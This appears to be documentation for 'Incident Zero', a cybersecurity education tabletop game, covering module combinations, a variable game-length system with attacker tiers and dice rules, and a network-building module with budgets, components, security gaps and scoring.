Modules based on: - Incident Response v2.1 with Uncontained Threats & Pentester Tactics - Hardening as the post-detection defensive module (typically follows an IR win) - Disaster Recovery as the breach-crisis module (typically follows an IR loss) - Network Building from original design (needs v2.1 refresh) - Forensics added in v2.1 (investigation & attribution) - Audit & Compliance from original design (needs v2.1 refresh)
Pending Refinements: - Network Building: Update to reflect v2.1 mechanics - Audit & Compliance: Update to reflect v2.1 mechanics - All modules: Explicit standalone setup procedures - Modifier generation: Formalize dice/card procedures
Key Takeaway: You are not bound to a rigid structure. Incident Zero modules are tools in your pedagogical toolkit. Choose the modules that serve your learning objectives, sequence them in any order, and use the flexibility to adapt to your classroom needs.
Examples of Flexibility:
"I only have 45 minutes" → Play one module solo (Incident Response or Hardening)
"I want to teach the complete lifecycle" → Play all 6 modules in sequence (4-5 hours, split across sessions)
"My students need crisis management training" → Play Disaster Recovery solo
"I want to rebuild after a fictional breach" → Network Building + Hardening (no Incident Response)
"I need governance training" → Audit & Compliance solo or after Hardening
Bottom Line: Incident Zero is flexible. Your classroom needs come first. Choose the modules and combinations that work for you.
docs/module-combinations.md
This guide provides quick reference combinations for the 6 modules and recommended time allocations.
Pick ONE module and play it solo with generated modifiers.
| Module | Focus | Setup | Gameplay | Debrief |
|---|---|---|---|---|
| Network Building | Infrastructure design | 5 min | 25-35 min | 5-10 min |
| Hardening | Defense-in-depth | 5 min | 25-35 min | 5-10 min |
| Incident Response | Attack detection | 5 min | 25-35 min | 5-10 min |
| Disaster Recovery | Crisis management | 5 min | 25-35 min | 5-10 min |
| Forensics | Investigation & attribution | 5 min | 25-35 min | 5-10 min |
| Audit & Compliance | Security assessment | 5 min | 25-35 min | 5-10 min |
Setup Note: Generate all modifiers (dice rolls, scenario cards) during setup phase.
Network Building → Incident Response - Network designed in Module 1 - Attack tests network design in Module 2 - Modifiers Flow: Network layout informs threat scenarios - Learning: How network design affects attack surface - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Win) → Hardening - Attack detected successfully - Build defenses against known threats - Modifiers Flow: Discovered attack vectors guide defense priorities - Learning: How detection informs hardening strategy - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Loss) → Disaster Recovery - Attack succeeds; breach occurs - Crisis management under pressure - Modifiers Flow: Breach scope determined by IR outcome - Learning: Cost of detection failure; crisis response procedures - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Network Building → Audit & Compliance - Network designed to meet requirements - Audit identifies gaps and violations - Modifiers Flow: Network design determines audit findings - Learning: Compliance integration into design phase - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Incident Response (Win) → Forensics - Attack detected successfully in IR phase - Forensic investigation to understand and attribute attack - Modifiers Flow: Discovered attack chain guides forensic analysis - Learning: How investigation reveals attacker techniques and identity - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Disaster Recovery → Forensics - Crisis response to major breach (from IR failure) - Forensic investigation to understand scope and attribution - Modifiers Flow: DR outcomes inform forensic investigation priorities - Learning: How investigation informs future hardening decisions - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief
Network Building → Incident Response → Hardening - Network design established - Attack tests the network - Hardening addresses findings - Modifiers Flow: Design → Attack vectors → Defense priorities - Learning: Complete security lifecycle (design → test → improve) - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Loss) → Disaster Recovery → Audit - Detection fails; breach occurs - Crisis management and recovery - Compliance audit of breach response - Modifiers Flow: IR outcome → DR decisions → Audit findings - Learning: Incident lifecycle from failure through recovery - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Hardening → Audit & Compliance - Network designed - Defenses built proactively - Compliance validation - Modifiers Flow: Design → Defense strategy → Audit review - Learning: Proactive security from design through validation - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Incident Response → Disaster Recovery - Network architecture established - Attack against that architecture - Crisis management following detection failure - Modifiers Flow: Design → Attack scenarios → Breach scope - Learning: How design affects attack success/failure - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Loss) → Disaster Recovery → Forensics - Detection fails; breach occurs - Crisis management and response - Forensic investigation for lessons learned - Modifiers Flow: IR outcome → DR decisions → Forensic findings - Learning: Complete failure response lifecycle with attribution - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Incident Response (Win) → Forensics → Hardening - Attack detected and contained - Forensic investigation reveals techniques and attribution - Hardening built specifically against discovered attack - Modifiers Flow: Detected threats → Forensic findings → Defense priorities - Learning: Complete investigation-to-hardening workflow - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief
Network Building → Incident Response (Win) → Hardening → Audit - Design secure network - Test against attack (succeed) - Harden based on findings - Audit final security posture - Best For: Advanced learners, comprehensive security overview - Total Time: 20 min setup + 140-170 min gameplay + 15 min debrief
Network Building → Incident Response (Loss) → Disaster Recovery → Hardening → Audit - Design network - Attack succeeds - Crisis management - Rebuild/harden after breach - Compliance audit of recovery - Best For: Advanced learners, crisis + recovery + compliance - Total Time: 25 min setup + 160-190 min gameplay + 20 min debrief
Network Building → Incident Response (Loss) → Disaster Recovery → Forensics → Hardening - Design network - Attack detection fails - Crisis response - Forensic investigation and attribution - Build hardening based on forensic findings - Best For: Advanced learners, investigation-focused curriculum - Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief
Network Building → Incident Response (Win) → Forensics → Hardening → Audit - Design network - Attack detected and contained - Forensic investigation reveals techniques - Hardening against discovered threats - Audit of final security posture - Best For: Advanced learners, successful response workflow - Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief
Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit & Compliance - Design secure network - Build proactive defenses - Test against attack - Handle breach crisis (if IR fails) - Investigate for lessons learned - Audit overall security posture - Best For: Research, comprehensive security curriculum, teacher training - Total Time: 30 min setup + 210-240 min gameplay + 25 min debrief
Setup: All teams play same module(s) simultaneously
When modules aren't combined sequentially, generate missing modifiers during setup:
Generate Attack Vectors via Scenario Card: - Draw 4 cards from scenario deck - Each card describes a threat vector and difficulty - Players must defend against all 4 vectors
Or Generate via Dice: - Roll 4d6 for each vector type - Result determines threat sophistication (3=easy, 6=hardest) - Adjust defense difficulty accordingly
Generate Breach Scope via Dice: - Roll 2d6: [3-5] = Low (50K records), [6-8] = Medium (500K), [9-12] = High (5M+) - Generate breach timeline: Roll 1d4 = hours before discovery (1=6h, 2=12h, 3=24h, 4=48h) - Set ransom demand: d20 × $50K
Or Use Scenario Card: - Educator describes breach scenario (real or fictional) - Players respond to described incident
Generate Attack Chain via Threat Cards: - Shuffle threat card deck - Draw 3, 4, or 5 cards (by difficulty) - Arrange in logical attack progression - Create clues for Threat Orchestrator
Or Use Pre-Built Scenario: - Use sample scenarios from core rules - Customize threat vectors based on learning objectives
Generate Requirements via Requirement Card: - Draw cards specifying assets: "Email Server, Customer Database, Development Network" - Draw security requirements: "MFA required, Data encryption mandatory, Audit logging" - Players design network meeting all constraints
Generate Audit Scope via Dice: - Roll 1d4: [1] = Financial compliance, [2] = Data protection, [3] = Incident response, [4] = Mixed - Roll 1d3: [1] = 3 findings needed, [2] = 5 findings, [3] = 7 findings - Determine which findings player must identify during audit
Example: "Teach incident response AND hardening in 90 minutes"
High Compatibility (Strong modifier flow): - ✓✓ Incident Response + Hardening - ✓✓ Incident Response + Forensics (if IR successful) - ✓✓ Disaster Recovery + Forensics (if IR fails) - ✓✓ Forensics + Hardening (forensic findings guide hardening) - ✓✓ Forensics + Audit (forensic findings inform compliance) - ✓✓ Network Building + Hardening - ✓✓ Network Building + Audit - ✓✓ Disaster Recovery + Audit - ✓✓ Incident Response + Disaster Recovery
Medium Compatibility (Weak modifier flow, mostly independent): - ✓ Incident Response + Audit - ✓ Hardening + Disaster Recovery - ✓ Network Building + Disaster Recovery - ✓ Incident Response + Network Building - ✓ Forensics + Network Building (investigation reveals architecture needs)
Single Module = 45 min session - Setup: 5 min - Play: 25-35 min - Debrief: 5-10 min
Two Modules = 90 min session - Setup: 10 min - Play: 55-70 min - Debrief: 10-15 min
Three Modules = 120 min session - Setup: 15 min - Play: 80-100 min - Debrief: 10-15 min
Four/Five Modules = 2+ hours - Setup: 20-25 min - Play: 140-210 min - Debrief: 15-25 min
Last updated: October 2025 For complete module details, see docs/FRAMEWORK.md
docs/VARIABLE_GAME_LENGTH_SYSTEM.md
Version: 2.1 - Production Ready Last Updated: October 2025 Status: Core System for All Modules
Incident Zero v2.1 introduces a Variable Game Length System that adds realism and variety without requiring complex calculations. The system has two parallel tracks:
Both produce realistic game lengths that scale with attack complexity while maintaining educational depth.
Real-world basis: - Some cyberattacks unfold in hours (ransomware deployments) - Others take months (APT reconnaissance and persistence) - Fixed 7-turn limits feel artificial
Educational value: - Variable timelines teach "attacks aren't one-size-fits-all" - Tight timelines create pressure; loose timelines reward caution - Randomness mirrors real incident response unpredictability
Game design value: - Prevents pattern recognition ("all games are exactly 7 turns") - Encourages adaptation ("we have fewer turns, prioritize differently") - Adds replayability ("same scenario, different timeline")
Turn Count = (Number of Attack Cards × 2) + 1
| Attack Chain | Calculation | Turn Count | Session Time |
|---|---|---|---|
| 3 cards | (3 × 2) + 1 | 7 turns | ~30-40 min |
| 4 cards | (4 × 2) + 1 | 9 turns | ~35-45 min |
| 5 cards | (5 × 2) + 1 | 11 turns | ~40-50 min |
| 6 cards | (6 × 2) + 1 | 13 turns | ~45-55 min |
Beginner Threat Orchestrator:
"I've selected 4 threat cards for my attack chain: Phishing → Credential Theft → Lateral Movement → Ransomware. Using the formula: (4 × 2) + 1 = 9 turns. You have 9 turns to detect and contain all four threats. Timer starts now!"
The Tier + d4 system gives experienced Threat Orchestrators control over attack sophistication while maintaining randomness for realism.
Turn Count = [Tier Base Range] + d4 Modifier
Choose ONE tier based on attack sophistication (not visibility to players):
Attacker Profile: - Script kiddies using publicly available tools - Low operational security - Little reconnaissance - Obvious techniques
Examples: - Basic phishing + default malware - Publicly known exploits - No persistence mechanisms
When to Use: - Beginner players learning the game - Educational scenario with clear attack progression - Teaching specific threat technique
Attacker Profile: - Organized cybercriminal group - Medium operational security - Some reconnaissance - Mix of known and custom tools
Examples: - Targeted phishing + credential harvesting - Lateral movement with known exploits - Basic persistence mechanisms - Some anti-analysis awareness
When to Use: - Most standard scenarios - Realistic criminal syndicate attacks - Default for intermediate players
Attacker Profile: - Advanced Persistent Threat (APT) group - Strong operational security - Extensive reconnaissance - Custom tools and zero-days
Examples: - Multi-vector attack with coordination - Advanced persistence (firmware, kernel modules) - Anti-forensics techniques - Encrypted command-and-control
When to Use: - Advanced player groups - Teaching state-sponsored attack techniques - Scenarios based on real APT campaigns
Attacker Profile: - State-sponsored cyber operations - Extreme operational security - Months of reconnaissance - Military-grade tools and exploits
Examples: - Coordinated multi-system compromise - Supply chain attacks - Persistent access maintained for years - Infrastructure with plausible deniability
When to Use: - Research and curriculum development - Training elite response teams - Historical incident analysis (Stuxnet, NotPetya, etc.)
To add unpredictability, roll 1d4 and apply modifier:
| Roll | Modifier | Interpretation | Examples |
|---|---|---|---|
| 1 | -1 turn | Tight/Fast | "Attacker worked faster than expected; they had insider knowledge" |
| 2 or 3 | ±0 turns | No change | "Timeline proceeded as expected" |
| 4 | +1 turn | Loose/Slow | "Attacker was cautious with extended reconnaissance phase" |
d4 Distribution: - 25% chance of tight timeline (-1) - 50% chance of baseline (±0) - 25% chance of extended timeline (+1)
Final Turn Count = Tier Base + d4 Result
Example 1: Standard Criminal Group (TIER 2)
Tier: TIER 2 (8-10 turns base)
Narrative: Organized ransomware group targeting healthcare
Roll: d4 = 2 (no modifier)
Final: 8-10 turns
Announcement: "This organized group has compromised your network.
You have 8-10 turns to detect and contain them."
Example 2: APT Attack (TIER 3)
Tier: TIER 3 (11-13 turns base)
Narrative: State-sponsored group conducting corporate espionage
Roll: d4 = 4 (+1 turn)
Final: 12-14 turns
Announcement: "A sophisticated actor has been operating in your network
for weeks. You have 12-14 turns to uncover the full extent of their access."
Example 3: Script Kiddie (TIER 1)
Tier: TIER 1 (5-7 turns base)
Narrative: Attacker using public PoC exploit
Roll: d4 = 1 (-1 turn)
Final: 4-6 turns
Announcement: "An attacker has hit your systems hard and fast.
You have only 4-6 turns before data starts being exfiltrated."
These three rules ensure the system maintains educational value and prevents metagaming:
Statement: Threat Orchestrators MUST accept the d4 result as-is, regardless of whether it feels unreasonably tight or loose for the scenario.
Rationale: Real incident response is chaotic. Sometimes: - Well-prepared attackers execute faster than expected (they had intel) - Cautious attackers spend weeks in reconnaissance (defensive posture matters) - Budget runs out faster than expected (incident response is expensive)
Embracing the Chaos: When a roll feels unexpected, narrate it as realism:
Implementation: - Roll d4 publicly (so players see it wasn't rigged) - Accept the result immediately - Narrate it into the scenario realistically - Move on; don't second-guess the dice
Example Conversation:
TO: "TIER 2 attack, so 8-10 turns baseline. Rolling for variation..."
[Rolls d4: 1, which means -1]
TO: "That's tight—only 7-9 turns. But that makes sense; this group
has compromised your supplier before and knew your infrastructure.
You have 7-9 turns."
What NOT to do:
TO: "I rolled a 1, but that feels too tight. Let me roll again."
✗ NO - Accept the first roll
TO: "I rolled a 1, so I'm ignoring it and using 8-10 instead."
✗ NO - That undermines the system
TO: "That's tight but I'll add 2 turns to make it fair."
✗ NO - Only Rule 3 allows modifications (and only ±1, rarely)
Statement: Blue Team members CANNOT deduce (or ask about) the attack TIER from the announced turn count. They cannot use meta-information like "we have 9 turns, so this must be TIER 2."
Rationale: - In reality, companies don't know attack sophistication in advance - Attackers don't advertise their skill level - Discovering attacker sophistication through evidence is more educational - This prevents metagaming ("we know it's TIER 2, so let's play for 9 turns max")
What Players CAN Do: - Ask "What suspicious activity have we detected?" → Investigates to understand threats - Ask "Can we analyze the malware?" → Reveals sophistication through findings - Ask "Why did this attack succeed?" → Post-game discussion (after game ends) - Ask "How much damage was done?" → Forensic investigation (post-game)
What Players CANNOT Do: - Ask "Is this a TIER 2 attack?" → Directly asking tier (prohibited) - Say "This must be TIER 3 because we have 12 turns" → Meta-reasoning (prohibited) - Assume "TIER 1 = simple, so let's focus on basics" → Meta-optimization (prevents discovery)
Implementation:
When players ask about tier/difficulty:
Player: "Is this a TIER 2 attack?"
TO: "Investigate and you'll find out. What do you want to do?"
Player: "This looks like TIER 3 based on the turn count..."
TO: "Turn count ≠ difficulty. Investigate the evidence and make your own assessment."
Player: "Can we see what we're facing?"
TO: "Some will reveal through investigation. Some will surprise you."
Statement: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment if the rolled result creates a genuinely problematic situation.
Frequency: This should be RARE (< 10% of games). Default: accept rolls.
When to Use (Genuinely Justified):
Recommend: Extend by +1 to allow full exploration
New Player Group
(But challenge them on game 2)
Specific Real-World Incident
When NOT to Use (Accept Roll As-Is):
Implementation:
Step 1: Roll d4 (publicly)
Step 2: Calculate result (Tier Base + d4)
Step 3: Announce initial turn count
THEN if genuinely needed:
Step 4: Pause
Step 5: Explain why adjustment is necessary
Step 6: Apply ±1 modification (only ±1, not more)
Step 7: Announce final turn count
Step 8: Document the decision (for consistency in future scenarios)
Example Valid Use of Rule 3:
Setup: "I'm teaching the SolarWinds supply chain attack.
Real timeline was 6 hours to detection.
I have TIER 3 (11-13 turns).
Rolled d4: 2 (no modifier) = 11-13 turns.
That feels right—letting me adjust by -1 to model
the documented 10-12 hour timeline. Final: 10-12 turns."
Example Invalid Use of Rule 3:
WRONG: "I rolled 8-10 turns but my attack chain is 5 cards.
I want it longer, so I'm adding 2 turns."
CORRECT: Use TIER 3 (11-13) if you want a longer game
WRONG: "Players are doing well, so I'm extending by +2 turns."
CORRECT: No mid-game adjustments; accept the result
WRONG: "I'm just going to ignore the roll and use 10 turns."
CORRECT: Either accept d4 result or reroll from scratch (before game starts)
Hybrid Approach: Many TOs use Default Formula for most games, then switch to Tier System for special campaigns or advanced groups.
1. Design attack chain (pick 3-6 threat cards)
2. Count cards: ___
3. Calculate: (___ × 2) + 1 = ___ turns
4. Announce: "You have ___ turns."
5. Play
Time Investment: 30 seconds
1. Design attack scenario
2. Choose Tier 1-4 based on sophistication (don't announce number)
3. Write down Tier Base (e.g., "TIER 2: 8-10")
4. Roll d4 (publicly or private)
5. Calculate: Base + d4 result = Final turn count
6. [Optional] Apply Rule 3 modification if genuinely needed (rare)
7. Announce final turn count (no tier numbers)
8. Play
9. [After game] Discuss attack sophistication discovered through gameplay
Time Investment: 2-3 minutes
═══════════════════════════════════════════════════════════════
VARIABLE GAME LENGTH SYSTEM v2.1
═══════════════════════════════════════════════════════════════
SYSTEM 1: DEFAULT FORMULA (Beginners)
────────────────────────────────────
Turn Count = (Attack Cards × 2) + 1
3 cards → 7 turns | 4 cards → 9 turns
5 cards → 11 turns | 6 cards → 13 turns
SYSTEM 2: TIER + d4 (Advanced)
──────────────────────────────
Step 1: Choose Tier (1-4, don't reveal number)
TIER 1: 5-7 turns (simple)
TIER 2: 8-10 turns (standard)
TIER 3: 11-13 turns (advanced)
TIER 4: 14-16 turns (expert)
Step 2: Roll d4 (-1, 0, 0, or +1)
Step 3: Final Turn = Tier Base + d4 Result
CRITICAL RULES
──────────────
✓ Rule 1: Accept any roll (embrace chaos)
✓ Rule 2: Don't reveal tier (let players discover via gameplay)
✓ Rule 3: Modifier authority ONLY when genuinely needed (rare)
═══════════════════════════════════════════════════════════════
Q: Why use (×2) + 1 and not something else? A: Playtesting showed this gives attackers enough time to progress realistically while keeping games from dragging. It's also easy to calculate mentally.
Q: Can I use both systems in the same campaign? A: Yes! Use Default Formula for most games, Tier System for special scenarios.
Q: What if players figure out the formula? A: That's fine. Knowing the formula doesn't give them an advantage (they still don't know how many cards in the chain).
Q: Can I adjust turn count during the game? A: NO. Turn count is set at game start and never changes. Rule 3 modifications happen before game starts only.
Q: What if my attack chain doesn't fit (e.g., 2 cards or 7 cards)? A: - 2 cards: Use formula anyway (2 × 2 + 1 = 5 turns) or switch to Tier System - 7+ cards: Use Tier 3-4 instead of formula
Q: How do I explain randomness to new players? A: "Real incident response isn't predictable. Sometimes attackers are faster, sometimes slower. We're rolling to capture that realism."
Q: Should I tell players the turn count? A: YES, always tell them at game start. (The mystery is about attack sophistication, not game length.)
Q: Can I use a d6 or d12 instead of d4? A: Not recommended (changes probability distribution). Stick with d4 or no roll at all.
This system was introduced in v2.1 as players requested more realism in game pacing. Future versions may include:
For now, the two-track system (Default + Tier) provides both accessibility and depth.
Questions to answer through playtesting:
Feedback to collect: - Typical game length vs. expected (from formula) - Whether turn limits felt realistic - Whether players felt rushed or bored - Whether tier-hiding created effective mystery
Report findings to: GitHub Issues - Variable Game Length Feedback
Ready to set game length? Pick your formula and play!
docs/rules/module-network-building.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
The Network Building Module teaches players how to design IT infrastructure under budget constraints, business requirements, and trade-off decisions. This is a pre-game module designed to create the network context for other modules (particularly Incident Response, Hardening, and Disaster Recovery).
Key Concept: Architecture decisions create vulnerabilities that are discovered during investigations and audits. Bad decisions made here cost more money later.
Module Teaches: - Primary: Network architecture, infrastructure design, security trade-offs - Secondary: Budget prioritization, business vs. security balance, intentional/accidental vulnerabilities
Integration Point: - Network Building can be played standalone OR as setup for Incident Response/Hardening/Disaster Recovery modules - When combined with other modules, the network design created here becomes the context for those modules (see module-combinations.md)
| Difficulty | Budget | Recommended Use |
|---|---|---|
| Beginner | 60 | Learning networks; roomier budget, easier trade-offs |
| Standard | 50 | Balanced play, typical scenario |
| Advanced | 40 | Tight budget; hard trade-offs, strategic depth |
Budget represents: Time, money, and resources for infrastructure design
(v2.2) More budget = easier. Beginner gets the most budget; Advanced gets the least.
Narrative Framing:
"Your organization is building or rebuilding its IT infrastructure. You have limited budget and must support 500 employees with core business functions. Every decision will affect your security posture when this network is tested. Make smart trade-offs."
Key Point: Teams don't know yet which decisions will matter most. Some budget is "wasted" on nice-to-haves, some on security that (hopefully) won't be needed.
Components fall into 5 categories:
| Server Type | Cost | Capacity | Function | Security Notes |
|---|---|---|---|---|
| Email Server | 8 | 1 | Email system | Internet-facing; phishing target |
| Web Server | 7 | 1 | Public website | Internet-facing; exploit target |
| Database Server | 10 | 1 | Customer data | High-value target; access control critical |
| File Server | 6 | 2 | File storage | Often over-privileged; lateral movement point |
| Domain Controller | 12 | 2 | User identity (AD/Kerberos) | Critical; full compromise if breached |
| Development Server | 5 | 3 | Dev/testing environment | Weak security; staging ground for attacks |
| Backup Server | 9 | 1 | Data backup | Should be isolated; ransomware recovery |
| Cloud Workload | 4 | 2 | General cloud compute | Less control; API/credential exposure |
| Legacy System | 3 | 1 | Old/unmaintained system | High exploitability; hard to patch |
| Honeypot Decoy | 7 | 1 | Detection trap | Detects attackers; wastes attacker time |
Capacity Rules: - Each server can host a certain number of services (shown in Capacity column) - Services = business functions (email, web, database, identity, file storage, etc.) - Can OVERLOAD a server (put more services than capacity allows) to save budget, but creates risk
| Device Type | Cost | Function | Gameplay Effect |
|---|---|---|---|
| Firewall | 12 | Perimeter defense | Blocks traffic between network zones |
| Intrusion Detection (IDS) | 10 | Network monitoring | Detects lateral movement (+1 investigation modifier in IR) |
| Intrusion Prevention (IPS) | 14 | Network blocking | Blocks exploits passively |
| Load Balancer | 8 | Traffic distribution | Improves availability without extra capacity |
| VPN Gateway | 9 | Remote access | Enables secure remote work; attack surface if weak |
| Email Gateway | 6 | Email filtering | Stops phishing; reduces SOCIAL_ENGINEERING risk |
| Web Application Firewall (WAF) | 11 | App-level defense | Protects web servers from app attacks |
| Network Segmentation Switch | 10 | Microsegmentation | Creates isolated network zones |
| SIEM System | 15 | Centralized logging | Logs everything; helps IR investigations (+1 to Investigate in IR module) |
| Honeypot Network | 8 | Detection | Detects lateral movement; wastes attacker time |
How servers are logically organized and connected:
| Decision | Cost | Security Impact | Notes |
|---|---|---|---|
| Flat Network | 0 | No segmentation | All servers on same network; vulnerable but simple |
| Segmented Network (3 zones) | 5 | Basic isolation | Separate DMZ, Internal, Sensitive zones |
| Fully Isolated (multiple firewalls) | 12 | Strong isolation | Each zone protected; expensive but resilient |
| Cloud Hybrid (on-prem + cloud) | 8 | Complex | Adds cloud security considerations |
| Cloud First (mostly cloud) | 6 | Different attack surface | Less on-prem; more cloud API risk |
Architecture decisions are NON-NEGOTIABLE - teams must pick one to organize their network.
Teams MUST satisfy every Required item by end of game. Recommended items are not mandatory, but skipping one is recorded as a gap (and costs points at scoring).
| Requirement | Status | Satisfied By | Notes |
|---|---|---|---|
| Required | Email Server, OR hosted on a Cloud Workload | Non-negotiable | |
| Web Presence | Required | Web Server, OR hosted on a Cloud Workload | Online business |
| Customer Database | Required | Database Server, OR hosted on a Cloud Workload | Cloud-hosting the crown jewels is a recorded risk |
| User Identity (AD/Kerberos) | Required | Domain Controller | No substitute |
| Disaster Recovery (Backup) | Required (v2.2) | Backup Server | No backup = automatic FAIL on this requirement, recorded as a CRITICAL gap (not an instant game loss) |
| File Storage | Recommended (v2.2) | File Server, OR spare capacity/overload on another server | Gap if missing |
| Development/Testing | Recommended (v2.2) | Dev Server, OR overload another server | Overloading a server for dev is explicitly allowed |
| Remote Work VPN | Recommended (v2.2) | VPN Gateway | Gap if missing: risky remote-access workarounds |
Key Rule: Required items are fixed. Teams must find places to host them, even if it means cloud-hosting or overloading servers.
Affordability Check (v2.2) — the Required list fits every difficulty:
Physical location of infrastructure:
| Model | Cost | Notes |
|---|---|---|
| Self-Hosted (On-Premises) | 0 | Team controls; responsibility for patching |
| Cloud-Hosted (AWS/Azure/GCP) | 0 | Provider controls; less direct control |
| Hybrid | 0 | Mix of on-prem and cloud; complex |
Teams take 5 "Build Turns" (~3-4 minutes each to discuss and decide).
Each turn is a design-review phase (v2.2): the team may take any number of actions — place as many components as they can afford — before ending the turn. Turns are not a one-purchase limit; they are checkpoints where the design gets stress-tested.
Between turns, the Threat Orchestrator reveals a development: draw one Operational Event or Business Requirement card from the standalone decks (cards/network-building/standalone/), or narrate one (a stakeholder demand, a vendor issue, a budget change). This gives teams a reason to revisit the design each turn.
Available actions:
Cost: Server cost (3-12 Budget) Effect: Add server to infrastructure
How It Works: 1. Choose a server card 2. Decide which business services it will host 3. Pay the cost 4. Track remaining budget
Example: "We're placing a Domain Controller on-premises (12 Budget). It will host user identity, with a spare capacity slot for file storage. Remaining budget: 38."
Constraints: - Duplicates allowed (v2.2): you may deploy more than one server of the same type; each copy costs full price - Can't host a required service on a server that doesn't exist - Can OVERLOAD servers (see Overload Mechanic below)
Cost: Device cost (6-15 Budget) Effect: Add network defense or monitoring
How It Works: 1. Choose a security device card 2. Describe which servers/zones it protects 3. Pay the cost 4. Track placement on network diagram
Example Turn: "We're deploying a Firewall between our DMZ and Internal network (12 Budget). This blocks unauthorized traffic between zones. Remaining budget: 26."
Cost: Architecture cost (0-12 Budget) Effect: Determine how servers logically connect
How It Works: 1. Choose one architecture type (only ONE per game) 2. Describe zone organization 3. Pay the cost 4. Document on network diagram
Example Turn: "We're implementing a Segmented Network with 3 zones (5 Budget): - DMZ: Email and Web servers (internet-facing) - Internal: File servers and user workstations - Sensitive: Database and Domain Controller Remaining budget: 21."
Cost: Usually 0 (some cloud strategies cost money) Effect: Determines where infrastructure physically lives
How It Works: 1. Decide on hosting strategy 2. Apply to appropriate servers 3. Document on infrastructure card 4. Pay if cloud-specific (usually free)
Example Turn: "We're hosting our email and web servers on AWS (0 cost). Domain Controller stays on-premises. This reduces on-prem complexity but adds cloud management responsibility."
Cost: 0 Effect: Take no further actions this turn; preserve budget
Use When: Satisfied with current design or holding budget in reserve for surprises
Problem: Limited budget + mandatory services = imperfect solutions
Solution: Overload servers (put more services on one server than intended)
How It Works (v2.2): - If a server has capacity for 2 services, you can put 3+ on it - Cost: +1 Budget per extra service beyond capacity (paid when the service is added) - Benefit: Still far cheaper than buying another server - Risk: Overloaded server is harder to isolate; compromise affects multiple services
Example Scenario: "Budget remaining: 5. Still need to host Development Services.
Option A: Buy Dev Server for 5 (leaves 0 budget) Option B: Put Dev on our File Server, which already hosts File Storage and Email Backup (2/2). Overload by 1: pay 1 Budget (leaves 4)
We choose B: File Server becomes (File Storage, Email Backup, Dev Services — OVERLOADED 3/2)"
Consequences (Discovered Later): - Overloaded servers are easier to pivot from (when other modules investigate) - If one service is compromised, ALL services on that server are at risk - Recovery is harder (can't isolate just the compromised service)
Teams inevitably leave security gaps:
| Gap Type | How It Happens | Cost Saved | Later Consequence |
|---|---|---|---|
| No Segmentation | Too expensive (5-12) | 5-12 | All servers accessible after initial compromise |
| No Firewall | Too expensive (12) | 12 | Can't enforce zone boundaries |
| Legacy Systems | Cheap (3) | 7+ | Easy to exploit; unpatched vulnerabilities |
| Overloaded Servers | Budget pressure | 2-11 (server cost minus overload fees) | Multi-service compromise; hard to isolate |
| No Detection (no IDS/SIEM) | Expensive (10-15) | 10-15 | Attacks undetected; investigations harder |
| No Email Gateway | Phishing defense (6) | 6 | Phishing easier in IR module |
| No Honeypot | Luxury item (7) | 7 | Attackers move silently |
| All Cloud or All On-Prem | Simplicity | 0 | Security model doesn't fit actual architecture |
| No Backup Server | Expensive (9) | 9 | Automatic FAIL on the Disaster Recovery requirement |
| No SIEM | Most expensive (15) | 15 | Investigation takes longer |
Key Insight: These gaps are discovered when other modules test the network (Audit, Incident Response, Disaster Recovery).
Teams create an Infrastructure Summary Card:
YOUR NETWORK ARCHITECTURE (Standard, 50 Budget)
SERVERS DEPLOYED:
- Cloud Workload (AWS) - Hosts: Email + Web (2/2, cloud-hosted)
- Database Server (On-Prem) - Hosts: Customer Database
- Domain Controller (On-Prem) - Hosts: Identity, File Storage,
Dev Services (OVERLOADED 3/2, +1 Budget paid)
- Backup Server (On-Prem, isolated) - Hosts: Backups / DR
ARCHITECTURE: Segmented (3 zones)
- DMZ: (cloud workload fronts the internet)
- Internal: Users
- Sensitive: Database, Domain Controller, Backup Server
SECURITY DEVICES:
- Email Gateway (incoming mail)
- NO Firewall, NO IDS/SIEM, NO VPN Gateway, NO Honeypot
HOSTING: Hybrid (cloud front end, on-prem crown jewels)
BUDGET SPENT: 47/50 (3 remaining)
- Cloud Workload 4 + Database 10 + Domain Controller 12 + Backup 9
+ Segmented Architecture 5 + Email Gateway 6 + Overload 1 = 47
IDENTIFIED GAPS (for other modules):
- Overloaded Domain Controller (identity + files + dev on one box)
- No IDS/SIEM (attacks undetected; investigations harder)
- No VPN Gateway (remote workers use risky workarounds)
- Email and Web share one cloud workload (single point of failure)
After building, teams receive a score reflecting their design choices:
| Metric | Score |
|---|---|
| Requirements | +2 per Required item satisfied (Email, Web, Database, Identity, Backup) — max +10 |
| Segmentation | Implemented Segmented or Fully Isolated architecture = +10 |
| Detection | Deployed IDS, IPS, or SIEM = +5 |
| Recovery | Deployed Backup Server = +5 |
| Redundancy | Duplicated a critical server or deployed a Load Balancer = +5 |
| Contingency Reserve | 5-15 Budget remaining = +5; 1-4 remaining = +2; 0 or 16+ remaining = 0 |
Maximum: 40 points. The reserve bonus rewards smart utilization — meet the requirements and keep a small cushion; hoarding budget scores nothing.
Example Scoring (the sample network above, Standard 50): - All 5 Required items satisfied: +10 - Segmentation implemented: +10 - No IDS/IPS/SIEM: 0 - Backup Server deployed: +5 - No redundancy: 0 - 3 Budget remaining: +2 - Total: 27 points — Good design
Interpretation Tiers (v2.2): - 32-40 points: Enterprise-grade design; comprehensive protection - 22-31 points: Good design; most critical gaps covered - 12-21 points: Adequate design; some gaps remain - Below 12 points: High risk; many gaps; future modules will be challenging
